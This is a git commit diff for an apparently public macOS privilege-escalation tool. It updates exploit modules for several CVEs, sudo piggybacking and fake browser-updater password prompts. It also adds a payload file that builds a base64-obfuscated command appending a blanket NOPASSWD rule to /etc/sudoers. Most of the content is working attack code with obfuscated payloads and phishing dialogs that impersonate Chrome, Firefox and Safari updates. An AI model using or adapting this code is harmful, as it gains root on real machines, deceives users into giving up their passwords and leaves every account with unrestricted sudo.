1.1.0

thehappydinoa · thehappydinoa · commit 4aaa2a37ce0c · 2019-03-05T23:27:13.000-05:00
diff --git a/.gitignore b/.gitignore
@@ -1,2 +1,6 @@
 *.pyc
 __pycache__
+build/
+dist/
+.DS_Store
+*.spec
diff --git a/README.md b/README.md
@@ -2,7 +2,7 @@
 
 Tries to use various CVEs to gain sudo or root access. All exploits have an end goal of adding `ALL ALL=(ALL) NOPASSWD: ALL` to `/etc/sudoers` allowing any user to run `sudo` commands.
 
-![screenshot](screenshot.png)
+![screenshot](docs/screenshot.png)
 
 ## Exploits
 
@@ -11,10 +11,16 @@ Tries to use various CVEs to gain sudo or root access. All exploits have an end
 -   CVE-2015-5889
 -   CVE-2017-13872
 -   AppleScript Dynamic Phishing
--   Sudo Piggyback [Link](https://www.n00py.io/2016/10/privilege-escalation-on-os-x-without-exploits/)
+-   [Sudo Piggyback](https://www.n00py.io/2016/10/privilege-escalation-on-os-x-without-exploits/)
 
 ## Run
 
 ```bash
 python root.py
 ```
+
+## Dynamic Phishing
+
+![phishing](docs/phishing.png)
+
+![phishing_id](docs/phishing_id.png)
diff --git a/docs/phishing.png b/docs/phishing.png
diff --git a/docs/phishing_id.png b/docs/phishing_id.png
diff --git a/docs/screenshot.png b/docs/screenshot.png
diff --git a/exploits/__init__.py b/exploits/__init__.py
@@ -1,5 +1,6 @@
 import glob
 import os
 
-__all__ = [os.path.basename(f)[:-3]
-           for f in glob.glob(os.path.join(os.path.dirname(__file__), "*.py")) if not f.endswith("__init__.py")]
+not_exploits = ["__init__.py", "general.py"]
+__all__ = [os.path.basename(f)[:-3] for f in glob.glob(os.path.join(os.path.dirname(
+    __file__), "*.py")) if not f in not_exploits]
diff --git a/exploits/ardagent.py b/exploits/ardagent.py
@@ -15,7 +15,9 @@ def vulnerable(version):
 def run():
     """runs exploit"""
     rand = random_string()
-    payload = """osascript -e 'tell app "ARDAgent" to do shell script "{command}; echo {success}"'""".format(
-        command=DEFAULT_COMMAND, success=rand)
+    payload = """osascript <<END
+      set command to "{command}; echo {success}"
+      return tell app "ARDAgent" to do shell script command with prompt "{prompt}"
+    END""".format(command=DEFAULT_COMMAND, success=rand)
     response = osascript(payload)
     return rand in response
diff --git a/exploits/general.py b/exploits/general.py
@@ -5,7 +5,7 @@
 from subprocess import PIPE, Popen
 from xml.parsers.expat import ExpatError
 
-DEFAULT_COMMAND = "python " + os.getcwd() + "/run_as_sudo.py"
+DEFAULT_COMMAND = """python -c \\"$(echo aW1wb3J0IGJhc2U2NCwgb3M7IGV4ZWMoYmFzZTY0LmI2NGRlY29kZSgnYVdZZ2IzTXVaMlYwZFdsa0tDa2dQVDBnTURvZ2IzTXVjM2x6ZEdWdEtHSmhjMlUyTkM1aU5qUmtaV052WkdVb0oxcFhUbTlpZVVGcFVWVjRUVWxGUmsxVVJEQnZVVlY0VFV0VFFrOVVNVUpDVlRGT1dGSkViMmRSVlhoTlNXbEJLMUJwUVhaYVdGSnFURE5PTVZwSE9XeGpiazA5SnlrcERRcGxiSE5sT2lCd2NtbHVkQ2hpWVhObE5qUXVZalkwWkdWamIyUmxLQ2RXV0U1c1kybENjR041UW5WaU0xRm5ZMjA1ZG1SQlBUMG5LU2s9Jykp | base64 -D)\\" """
 
 
 def random_string():
@@ -23,7 +23,7 @@ def default_browser():
     handlers = plist.get("LSHandlers")
     for handler in handlers:
         scheme = handler.get("LSHandlerURLScheme")
-        if scheme and scheme == "https":
+        if scheme and (scheme == "https" or scheme == "http"):
             return handler.get("LSHandlerRoleAll")
     return
 
diff --git a/exploits/nopass.py b/exploits/nopass.py
@@ -15,7 +15,9 @@ def vulnerable(version):
 def run():
     """runs exploit"""
     rand = random_string()
-    payload = """osascript -e 'do shell script "{command}; echo {success}" user name "root" password "" with administrator privileges'""".format(
-        command=DEFAULT_COMMAND, success=rand)
+    payload = """osascript <<END
+      set command to "{command}; echo {success}"
+      return do shell script command with prompt "{prompt}" user name "root" password "" with administrator privileges
+    END""".format(command=DEFAULT_COMMAND, success=rand)
     response = osascript(payload)
     return rand in response
diff --git a/exploits/phish.py b/exploits/phish.py
@@ -11,28 +11,33 @@
 
 BROWSERS = {
     "com.google.chrome": "Google Chrome Updater",
-    "org.mozilla.firefox": "Firefox Updater"
+    "org.mozilla.firefox": "Firefox Updater",
+    "com.apple.safari": "Safari Update"
 }
 
 
 def admin_prompt(app=None, prompt="System Update", command="echo hello"):
     """prompts with administrator privileges"""
     rand = random_string()
     if app:
-        payload = """osascript -e 'tell app "{app}" to activate' -e 'tell application "{app}" to do shell script "{command}; echo {success}" with prompt "{prompt}" with administrator privileges'""".format(
-            app=app, prompt=prompt, command=command, success=rand)
+        payload = """osascript <<END
+          set command to "{command}; echo {success}"
+          tell app "{app}" to activate
+          return tell app "{app}" to do shell script command with prompt "{prompt}" with administrator privileges
+        END""".format(app=app, prompt=prompt, command=command, success=rand)
     else:
-        payload = """osascript -e 'do shell script "{command}; echo {success}" with prompt "{prompt}" with administrator privileges'""".format(
-            prompt=prompt, command=command, success=rand)
-    print("Prompting: " + prompt)
+        payload = """osascript <<END
+          set command to "{command}; echo {success}"
+          return do shell script command with prompt "{prompt}" with administrator privileges
+        END""".format(prompt=prompt, command=command, success=rand)
+    print("\nPrompting: " + prompt)
     response = osascript(payload)
-    print(response)
     return rand in response
 
 
 def vulnerable(version):
     """checks vulnerability"""
-    return "y" == input("[USER INTERACTION] Do you want to try to phish for sudo? (y/N): ")[0].lower()
+    return "y" == input("\n[USER INTERACTION] Do you want to try to phish for sudo? (y/N): ")[0].lower()
 
 
 def run():
diff --git a/exploits/piggyback.py b/exploits/piggyback.py
@@ -16,6 +16,7 @@ def vulnerable(version):
         return "y" == input("[USER INTERACTION] Do you want to piggyback off sudo (waits until sudo is used)? (y/N): ")[0].lower()
     return
 
+
 def run():
     """runs exploit"""
     sudo_dir = "/var/db/sudo"
diff --git a/payload.md b/payload.md
@@ -0,0 +1,56 @@
+# Payload
+
+## Part 1
+```python
+if os.getuid() == 0: os.system('echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers')
+else: print("User is not root")
+```
+
+## Part 1 base64
+```python
+if os.getuid() == 0: os.system(base64.b64decode('ZWNobyAiQUxMIEFMTD0oQUxMKSBOT1BBU1NXRDogQUxMIiA+PiAvZXRjL3N1ZG9lcnM='))
+else: print(base64.b64decode('VXNlciBpcyBub3Qgcm9vdA=='))
+```
+
+## Part 2
+```python
+import base64, os; exec(base64.b64decode('aWYgb3MuZ2V0dWlkKCkgPT0gMDogb3Muc3lzdGVtKGJhc2U2NC5iNjRkZWNvZGUoJ1pXTm9ieUFpUVV4TUlFRk1URDBvUVV4TUtTQk9UMUJCVTFOWFJEb2dRVXhNSWlBK1BpQXZaWFJqTDNOMVpHOWxjbk09JykpDQplbHNlOiBwcmludChiYXNlNjQuYjY0ZGVjb2RlKCdWWE5sY2lCcGN5QnViM1FnY205dmRBPT0nKSk='))
+```
+
+## Part 3
+```python
+python -c "$(echo aW1wb3J0IGJhc2U2NCwgb3M7IGV4ZWMoYmFzZTY0LmI2NGRlY29kZSgnYVdZZ2IzTXVaMlYwZFdsa0tDa2dQVDBnTURvZ2IzTXVjM2x6ZEdWdEtHSmhjMlUyTkM1aU5qUmtaV052WkdVb0oxcFhUbTlpZVVGcFVWVjRUVWxGUmsxVVJEQnZVVlY0VFV0VFFrOVVNVUpDVlRGT1dGSkViMmRSVlhoTlNXbEJLMUJwUVhaYVdGSnFURE5PTVZwSE9XeGpiazA5SnlrcERRcGxiSE5sT2lCd2NtbHVkQ2hpWVhObE5qUXVZalkwWkdWamIyUmxLQ2RXV0U1c1kybENjR041UW5WaU0xRm5ZMjA1ZG1SQlBUMG5LU2s9Jykp | base64 -D)"
+```
+or
+```bash
+python -c \"$(echo aW1wb3J0IGJhc2U2NCwgb3M7IGV4ZWMoYmFzZTY0LmI2NGRlY29kZSgnYVdZZ2IzTXVaMlYwZFdsa0tDa2dQVDBnTURvZ2IzTXVjM2x6ZEdWdEtHSmhjMlUyTkM1aU5qUmtaV052WkdVb0oxcFhUbTlpZVVGcFVWVjRUVWxGUmsxVVJEQnZVVlY0VFV0VFFrOVVNVUpDVlRGT1dGSkViMmRSVlhoTlNXbEJLMUJwUVhaYVdGSnFURE5PTVZwSE9XeGpiazA5SnlrcERRcGxiSE5sT2lCd2NtbHVkQ2hpWVhObE5qUXVZalkwWkdWamIyUmxLQ2RXV0U1c1kybENjR041UW5WaU0xRm5ZMjA1ZG1SQlBUMG5LU2s9Jykp | base64 -D)\"
+```
+
+
+## Modified Part 1
+```python
+if os.getuid() == 0: os.system('echo "ALL ALL=(ALL) NOPASSWD: ALL" >> test.log; echo echoed')
+else: print("User is not root")
+```
+
+## Modified Part 2
+```python
+import base64, os; exec(base64.b64decode('aWYgb3MuZ2V0dWlkKCkgPT0gMDogb3Muc3lzdGVtKCdlY2hvICJBTEwgQUxMPShBTEwpIE5PUEFTU1dEOiBBTEwiID4+IHRlc3QubG9nOyBlY2hvIGVjaG9lZCcpDQplbHNlOiBwcmludCgiVXNlciBpcyBub3Qgcm9vdCIp'))
+```
+
+## Modified Part 3
+```python
+python -c "$(echo aW1wb3J0IGJhc2U2NCwgb3M7IGV4ZWMoYmFzZTY0LmI2NGRlY29kZSgnYVdZZ2IzTXVaMlYwZFdsa0tDa2dQVDBnTURvZ2IzTXVjM2x6ZEdWdEtDZGxZMmh2SUNKQlRFd2dRVXhNUFNoQlRFd3BJRTVQVUVGVFUxZEVPaUJCVEV3aUlENCtJSFJsYzNRdWJHOW5PeUJsWTJodklHVmphRzlsWkNjcERRcGxiSE5sT2lCd2NtbHVkQ2dpVlhObGNpQnBjeUJ1YjNRZ2NtOXZkQ0lwJykp | base64 -D)"
+```
+or
+```bash
+python -c \"$(echo aW1wb3J0IGJhc2U2NCwgb3M7IGV4ZWMoYmFzZTY0LmI2NGRlY29kZSgnYVdZZ2IzTXVaMlYwZFdsa0tDa2dQVDBnTURvZ2IzTXVjM2x6ZEdWdEtDZGxZMmh2SUNKQlRFd2dRVXhNUFNoQlRFd3BJRTVQVUVGVFUxZEVPaUJCVEV3aUlENCtJSFJsYzNRdWJHOW5PeUJsWTJodklHVmphRzlsWkNjcERRcGxiSE5sT2lCd2NtbHVkQ2dpVlhObGNpQnBjeUJ1YjNRZ2NtOXZkQ0lwJykp | base64 -D)\"
+```
+
+## Delivery
+```bash
+osascript <<END
+    set command to "{command}"
+    return do shell script command with prompt "{prompt}" with administrator privileges
+END
+```
diff --git a/root.py b/root.py
@@ -2,31 +2,35 @@
 import platform
 from distutils.version import LooseVersion
 
-from exploits import *
+from exploits import ardagent, dyld_print_to_file, libmalloc, nopass, piggyback, phish
 
 REDC = "\033[91m[-] "
 YELLOWC = "\033[93m[!] "
 GREENC = "\033[92m[+] "
 ENDC = "\033[00m"
+NL = "\n"
 
 
 def main():
     """main function"""
     version = platform.mac_ver()[0]
+    print(GREENC + "Trying to escalate privileges on macOS %s..." % version + ENDC)
     for exploit in [ardagent, dyld_print_to_file, libmalloc, nopass, piggyback, phish]:
+        if not all(ex in dir(exploit) for ex in ["vulnerable", "run"]):
+            continue
         if not exploit.vulnerable(LooseVersion(version)):
-            print(YELLOWC + "Skipping %s...\n" % exploit.__name__ + ENDC)
+            print(NL + YELLOWC + "Skipping %s..." % exploit.__name__ + ENDC)
             continue
-        print(YELLOWC + "Trying %s...\n" % exploit.__name__ + ENDC)
+        print(NL + YELLOWC + "Trying %s..." % exploit.__name__ + ENDC)
         try:
             result = exploit.run()
         except KeyboardInterrupt:
             continue
         if result:
             print(GREENC + exploit.__name__ + " was successful!" + ENDC)
             return result
-        print(REDC + "Failed\n" + ENDC)
-    print(REDC + "All Exploits Failed..." + ENDC)
+        print(NL + REDC + "Failed" + ENDC)
+    print(NL + REDC + "All Exploits Unsuccessful" + ENDC)
     return
 
 
diff --git a/run_as_sudo.py b/run_as_sudo.py
diff --git a/screenshot.png b/screenshot.png

-Original file line number
+Diff line change
@@ @@ -1,2 +1,6 @@ @@
 *.pyc
 __pycache__
 +build/
 +dist/
 +.DS_Store
 +*.spec